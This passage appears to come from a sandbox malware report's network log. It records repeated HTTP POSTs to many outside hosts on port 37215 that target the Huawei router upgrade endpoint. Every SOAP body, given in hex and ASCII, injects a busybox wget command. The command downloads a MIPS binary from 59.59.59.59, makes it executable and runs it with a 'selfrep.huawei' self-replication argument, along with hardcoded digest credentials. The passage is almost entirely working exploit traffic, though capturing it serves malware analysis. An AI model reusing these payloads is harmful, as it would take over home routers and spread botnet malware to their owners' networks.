70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          73192.168.2.1540946169.249.142.21137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.508086920 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          74192.168.2.153430469.105.202.8137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.508097887 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          75192.168.2.1541088197.227.145.22037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.508100033 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          76192.168.2.1559666131.36.4.737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.508132935 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          77192.168.2.1549822197.246.131.15237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.508132935 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          78192.168.2.1558354197.121.104.437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.508171082 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          79192.168.2.1555542167.174.181.2137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.508174896 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          80192.168.2.1533232197.248.76.7737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.508188963 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          81192.168.2.1537746197.227.36.17437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.508207083 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          82192.168.2.1556790149.130.156.5737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.508249998 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          83192.168.2.153734241.192.187.10437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.508258104 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
